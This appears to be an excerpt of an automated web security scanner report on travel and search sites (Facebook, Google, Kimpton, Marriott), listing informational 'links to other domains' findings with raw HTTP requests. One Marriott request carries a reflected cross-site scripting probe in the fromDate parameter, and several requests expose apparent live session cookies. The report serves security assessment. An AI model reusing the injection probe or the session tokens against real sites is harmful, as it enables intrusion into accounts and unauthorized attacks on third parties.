GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&id=50243286972&name=&width=180&connections=6&stream=&logobar=&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.39
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 10492

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/CruisesOnly" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50273_50243286972_5242960_q.jpg" alt="CruisesOnly" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1437480568" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/187649_1437480568_3635374_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000165667246" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273858_100000165667246_5859479_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kmarinaro" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274788_1510239203_1857310_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000508657435" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275723_100000508657435_8088263_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=650482862" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/211566_650482862_4925707_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=31301034" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273419_31301034_2024607078_q.jpg" alt="" /><div class="name">
...[SNIP]...
17.39. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=cruise HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 143169

<!doctype html> <head> <title>cruise - Google Search</title> <script>window.google={kEI:"OK2JTrScBafRiALAoZTHDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?gcx=c&q=cruise&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.royalcaribbean.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CHUQFjAA')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:rTMl7ZAjzAoJ:www.royalcaribbean.com/+cruise&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CHcQIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.royalcaribbean.com/findacruise/home.do" onmousedown="return clk(this,this.href,'','','','1','','0CHkQ0gIoADAA')">Plan a Cruise</a> - <a href="http://www.royalcaribbean.com/findacruise/search/home.do" onmousedown="return clk(this,this.href,'','','','1','','0CHoQ0gIoATAA')">Search For a Cruise</a> - <a href="http://www.royalcaribbean.com/findacruise/ships/home.do" onmousedown="return clk(this,this.href,'','','','1','','0CHsQ0gIoAjAA')">Ships</a> - <a href="http://www.royalcaribbean.com/mycruises/homeLoggedout.do" onmousedown="return clk(this,this.href,'','','','1','','0CHwQ0gIoAzAA')">My Cruises</a>
...[SNIP]...
<h3 class="r"><a href="http://www.carnival.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CIEBEBYwAQ')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:FsT4YemmwYAJ:www.carnival.com/+cruise&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CIMBECAwAQ')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.carnival.com/findcruise.aspx" onmousedown="return clk(this,this.href,'','','','2','','0CIUBENICKAAwAQ')">Find a cruise</a> - <a href="https://secure.carnival.com/BookedGuest/" onmousedown="return clk(this,this.href,'','','','2','','0CIYBENICKAEwAQ')">Manage My Cruises</a> - <a href="http://www.carnival.com/funships.aspx" onmousedown="return clk(this,this.href,'','','','2','','0CIcBENICKAIwAQ')">The Fun Ships</a> - <a href="http://www.carnival.com/cms/fun/specials/pay-per-day-2.aspx" onmousedown="return clk(this,this.href,'','','','2','','0CIgBENICKAMwAQ')">Early Saver Specials</a>
...[SNIP]...
<h3 class="r"><a href="http://www.travelocity.com/Cruises" class=l onmousedown="return clk(this,this.href,'','','','3','','0CI0BEBYwAg')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:rky6tiZDEWgJ:www.travelocity.com/Cruises+cruise&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CI8BECAwAg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cruise.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CJQBEBYwAw')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:vfO-sfCTOC0J:www.cruise.com/+cruise&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CJYBECAwAw')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.cruise.com/deals/last-minute/cruises.aspx?skin=001&amp;pin=&amp;phone=888-333-3116" onmousedown="return clk(this,this.href,'','','','4','','0CJgBENICKAAwAw')">Last Minute Cruise Deals</a> - <a href="http://www.cruise.com/deals/royal-caribbean/rccl.aspx?skin=001&amp;pin=&amp;phone=888-333-3116" onmousedown="return clk(this,this.href,'','','','4','','0CJkBENICKAEwAw')">Royal Caribbean Deals</a> - <a href="http://www.cruise.com/deals/carnival/index.aspx?skin=001&amp;pin=&amp;phone=888-333-3116" onmousedown="return clk(this,this.href,'','','','4','','0CJoBENICKAIwAw')">Carnival Cruise Lines Deals</a>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.honeymoon-tours.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKcBEKACMAU')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -70px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.honeymoon-tours.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKcBEKACMAU')">Toshali Honeymoons</a>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.atlanticpacifictravel.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CK8BEKACMAY')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -105px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.atlanticpacifictravel.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CK8BEKACMAY')">Atlantic Pacific Travel</a>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.peaktravel.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLcBEKACMAc')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -140px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.peaktravel.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLcBEKACMAc')">R. T. Peak Travel Group</a>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.allcruise.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CL8BEKACMAg')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -175px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.allcruise.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CL8BEKACMAg')">All <em>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.sunnyvaletravel.net/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMcBEKACMAk')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -210px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.sunnyvaletravel.net/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMcBEKACMAk')">Sunnyvale Travel Inc</a>
...[SNIP]...
<span style="padding:10;width:24px;height:38px"><a href="http://www.alpine-travel.com/" class=l onmousedown="return clk(this,this.href,'','','','11','','0CNABEKACMAo')" style="border:none;display:block;overflow:hidden;width:19px;height:35px"><span style="background:url('/images/red_icons_sm_A_J_dot.png') no-repeat;background-position:0 -245px;display:block;height:35px;width:19px">
...[SNIP]...
<h4 class=r><a href="http://www.alpine-travel.com/" class=l onmousedown="return clk(this,this.href,'','','','11','','0CNABEKACMAo')">Alpine Travel of Saratoga</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hornblower.com/hce/home/sd" class=l onmousedown="return clk(this,this.href,'','','','12','','0CNsBEBYwCw')">San Diego <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:XgaezjiWOSoJ:www.hornblower.com/hce/home/sd+cruise&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','12','','0CN0BECAwCw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.princess.com/" class=l onmousedown="return clk(this,this.href,'','','','13','','0COIBEBYwDA')">Princess <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:1lVj0_NXgyAJ:www.princess.com/+cruise&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','13','','0COQBECAwDA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cruises.orbitz.com/" class=l onmousedown="return clk(this,this.href,'','','','14','','0COkBEBYwDQ')">ORBITZ <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:BshAU7FdhaoJ:cruises.orbitz.com/+cruise&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','14','','0COsBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.alcatrazcruises.com/" class=l onmousedown="return clk(this,this.href,'','','','15','','0CPABEBYwDg')">Alcatraz Island - Official Tickets Site - Guaranteed Lowest Price</a>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:ebufZwl1ybQJ:www.alcatrazcruises.com/+cruise&amp;cd=15&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','15','','0CPIBECAwDg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vacationstogo.com/" class=l onmousedown="return clk(this,this.href,'','','','16','','0CPcBEBYwDw')">Discount <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:mDDXwAVaqAUJ:www.vacationstogo.com/+cruise&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','16','','0CPkBECAwDw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cruise.expedia.com/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CP4BEBYwEA')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:IINVjxO0ba0J:cruise.expedia.com/+cruise&amp;cd=17&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','17','','0CIACECAwEA')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.boston.com/sports/football/patriots/articles/2011/10/02/patriots_defeat_raiders/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CIUCEKkCMBE')">Patriots <em>
...[SNIP]...
<span class=tl><a href="http://www.washingtonpost.com/sports/redskins/baltimore-ravens-score-three-defensive-touchdowns-to-cruise-past-mark-sanchez-and-new-york-jets/2011/10/02/gIQAuctxGL_story.html" class=l onmousedown="return clk(this,this.href,'','','','19','','0CIsCEKkCMBI')">Baltimore Ravens score three defensive touchdowns to <em>
...[SNIP]...
17.40. http://www.kimptonhotels.com/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0 HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.1.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635583811:ss=1317635583811

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51664


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels &amp; Restaurants - Search</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0">
...[SNIP]...
<li class="menuparent"><a href="http://www.kimptonchefs.com" target="_blank">Kimpton Chefs<img src="/assets/clear.gif" width="15" height="1" border="0">
...[SNIP]...
<li class="menuparent"><a href="http://www.kimptonstyle.com" target="_blank">Shop Kimpton Style<img src="/assets/clear.gif" width="15" height="1" border="0">
...[SNIP]...
<li class="menuparent"><a href="http://www.kimptonstyle.com" target="_blank">Shop Kimpton Style<img src="/assets/clear.gif" width="15" height="1" border="0">
...[SNIP]...
<area shape="rect" coords="12,10,268,55" href="http://www.kimptonhotels.com" alt="Kimpton Hotels &amp; Restaurants" /> <area shape="rect" coords="896,22,938,57" href="http://www.lifeissuite.com" target="_blank" alt="Kimpton Blog" /> <area shape="rect" coords="839,28,865,56" href="http://www.facebook.com/pages/Kimpton-Hotels-Restaurants/51530158577?ref=ts" target="_blank" alt="Join us on Facebook" /> <area shape="rect" coords="868,28,894,56" href="http://twitter.com/Kimpton" target="_blank" alt="Follow us on Twitter" /></map>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/DCSKIoc2rNH8I36lrbe6wexE5_5B9O/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=9.3.0&amp;WT.dcssip=www.kimptonhotels.com"/></div>
...[SNIP]...
17.41. http://www.marriott.com/search/submitSearch.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=6e560%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0a08f5e4844&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; JVMID=pEbizMdcomD244_prd3; mbox=session#1317646533235-184575#1317649775|PC#1317646533235-184575.19#1318857515|check#true#1317647975; s_pers=%20s_lv%3D1317647915281%7C1412255915281%3B%20s_lv_s%3DFirst%2520Visit%7C1317649715281%3B; s_sess=%20s_cc%3Dtrue%3B%20cmm%3D%257Bchannel%253A%2527Other%2520Websites%2527%252Ckeyword%253A%2527n/a%2527%252Cpartner%253A%2527Other%2520Websites%2527%252Creferrer%253A%2527http%253A//burp/show/4%2527%252CcampaignId%253A%2527n/a%2527%257D%3B%20p_campaign%3DUnpaid%2520Referrals%253A%2520burp%3B%20s_sq%3D%3B; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_bos*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"ru":"http://burp/show/3","r":"burp","st":"","pv":2,"to":4.6,"c":"http://www.marriott.com/search/submitSearch.mi","lc":{"d4":{"v":2,"s":true}},"cd":4,"sd":4,"f":1317647913957}; MI_SITE=prod3; IS3_History=1317397011-2-67_16-1-___16; IS3_GSV=DPL-2_TES-1317647911_PCT-1317647911_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD170_prd4; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 13:18:21 GMT
Content-Length: 172015
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<li>
                           
                           
                                                                                                                                                           <a href="http://www.marriott.fr/default.mi" title="Canada (Fran..ais)" title="" >
                                       Canada (Fran..ais)
                                   </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                           <a href="http://www.marriott.de/default.mi" title="Deutschland (Deutsch)" title="" >
                                       Deutschland (Deutsch)
                                   </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                           <a href="http://www.marriott.fr/default.mi" title="France (Fran..ais)" title="" >
                                       France (Fran..ais)
                                   </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                                                                                       <a href="http://www.marriottvacationclub.com/index.shtml?loc=IM59*1-28LMQH" title="Timeshare Vacations" title="" rel="external">
                                       Timeshare Vacations
                                   </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                                                                                       <a href="http://www.gomarriottvacations.com/" title="Flight + Hotel Packages" title="" rel="external">
                                       Flight + Hotel Packages
                                   </a>
...[SNIP]...
<li>
                           <a href="http://www.marriottvacationclub.com/index.shtml?loc=IM59*1-28LMQH" title="Timeshare Vacations" >
                               Timeshare Vacations
                           </a>
...[SNIP]...
<li>
                           <a href="http://www.gomarriottvacations.com" title="Vacations by Marriott" >
                               Vacations by Marriott
                           </a>
...[SNIP]...
<h3>
                   <a href="http://www.marriottvacationclub.com/index.shtml?loc=IM59*1-28LMQH" title="Timeshare Vacations">
                       Timeshare Vacations
                   </a>
...[SNIP]...
<li>
           
           
                                                                                                                                                                               <a href="http://www.shopmarriott.com/index.aspx" title="Shop Marriott" title="" >
                               Shop Marriott
                           </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                                                                                       <a href="http://www.shopmarriott.com/index.aspx" title="Shop Marriott" title="" rel="external">
                                       Shop Marriott
                                   </a>
...[SNIP]...
<li>
                           
                           
                                                                                                                                                                                                                       <a href="https://www.marriottregistry.com" title="Honeymoon Registry" title="" rel="external">
                                       Honeymoon Registry
                                   </a>
...[SNIP]...
17.42. https://www.marriott.com/reservation/availability.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availability.mi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /reservation/availability.mi?isSearch=true&propertyCode=BOSLA HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; JVMID=pEbizMdcomD167_prd1; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646556133}; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:56:19 GMT
Content-Length: 101861
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<li>
                           
                           
                                                                                                                                                                                                                       <a href="https://www.marriottregistry.com" title="Honeymoon Registry" title="" rel="external">
                                       Honeymoon Registry
                                   </a>
...[SNIP]...
17.43. http://www.marriottvacationclub.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /index.shtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.shtml?loc=IM59*1-28LMQH HTTP/1.1
Host: www.marriottvacationclub.com
Accept: */*
Accept-Language: en
